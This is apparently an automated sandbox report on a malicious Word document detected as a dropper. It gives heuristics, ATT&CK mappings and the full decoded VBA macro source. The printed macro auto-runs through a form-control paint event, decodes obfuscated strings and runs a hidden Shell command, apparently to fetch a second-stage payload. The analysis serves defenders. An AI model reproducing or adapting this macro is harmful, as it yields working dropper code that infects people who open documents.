Verdict: MALICIOUS (risk score 142)

Malware Insights

MITRE ATT&CK:
- T1059 Command and Scripting Interpreter
- T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6598387-0. Critical heuristics indicate the presence of VBA macros and a Shell() call within those macros. The VBA code appears to be designed to execute a command via Shell(), likely to download and execute a secondary payload, as suggested by the 'Doc.Dropper' classification.
Heuristics (4)

- ClamAV: Doc.Dropper.Agent-6598387-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6598387-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2802 bytes |

SHA-256 (macros.bas): 0dc1ec3eb7c6cf9d2bf585fcc353c3a7690ad33ed134ce2ff87c7a9adfa0bcfa
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkPicture1, 0, 0, MSINKAUTLib, InkPicture"
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    UserForm1.TextBox3 = "1"
End Sub
Attribute VB_Name = "Module2"
Function test2(ByRef text, dec, name)
    text = text + dec + name
End Function
Attribute VB_Name = "Module1"
Function gnkruhl()
    Randomize
    leng = 6 * Rnd() + 4
    name1 = ""
    For i = 1 To leng
        num = 24 * Rnd() + 97
        name1 = name1 + Chr(num)
    Next i
    gnkruhl = name1
End Function
Function DecodeString(text)
    decode = ""
    For i = 1 To Len(text)
        decode = decode + GetAlphabetSymbol(fghyut(Mid(text, i, 1)), 5)
    Next i
    DecodeString = decode
End Function
Function GetAlphabetSymbol(num, key)
    If num - key < 1 Then
        GetAlphabetSymbol = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + num - key, 1)
    Else
        GetAlphabetSymbol = Mid(UserForm1.TextBox1, num - key, 1)
    End If
End Function
Function fghyut(yuiuv)
    gutjh = UserForm1.TextBox1
    jkdhf8 = Len(gutjh)
    For i = 1 To jkdhf8
        If yuiuv = Mid(gutjh, i, 1) Then
            fghyut = i
        End If
    Next i
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C2E17B6D-ED6A-4836-AED7-E0749CFA13AD}{5A63530E-64B9-4FDD-9AE7-B27235148BEB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox2_Change()
    Shell UserForm1.TextBox2, 0
End Sub
Private Sub TextBox3_Change()
    name1 = gnkruhl()
    name2 = gnkruhl()
    dec3 = DecodeString("};{(iu f'ci/ptjajpi)%(ip%ui'/bdi(p}%kfu(bfhkldbi{\")
    dec1 = DecodeString("/)kt[/tgfuiojxibbt]$gfuiojxibbt]]ls(/pdf(t")
    dec2 = DecodeString("{.jpod(z,t\")
    dec4 = DecodeString("_$$qp)gq|")
    dec5 = DecodeString("%imi$$}:jphop gof/ijjt$$qp)gq|")
    dec6 = DecodeString("%imi$$:-poa;")
    dec7 = DecodeString("{$$xppgr[[(oozho)i(p%/f)[jhoah/h(%'d($$}-/hp/x;")
    dec8 = DecodeString("{$$xppgr[[fhjdj gofci/pj%/f)[jhoah/h(%'d($$}-$]]tetfsp ldbit i(/fkd(zthj/ddt ldbighpxtqp)gq|")
    name3 = gnkruhl()
    name4 = gnkruhl()
    text = ""
    test2 text, dec1, name1
    test2 text, dec2, name2
    test2 text, dec3, name2
    test2 text, dec4, name3
    test2 text, dec5, name3
    test2 text, dec6, name1
    test2 text, dec7, name1
    dec9 = DecodeString("%'hp:tjphop gof/ijjt$qp)gq|")
    dec10 = DecodeString("%'hp$t ud(kfujpabitxdkki(]")
    test2 text, dec8, name4
    test2 text, dec9, name4
    test2 text, dec10, ""
    UserForm1.TextBox2 = text
End Sub
```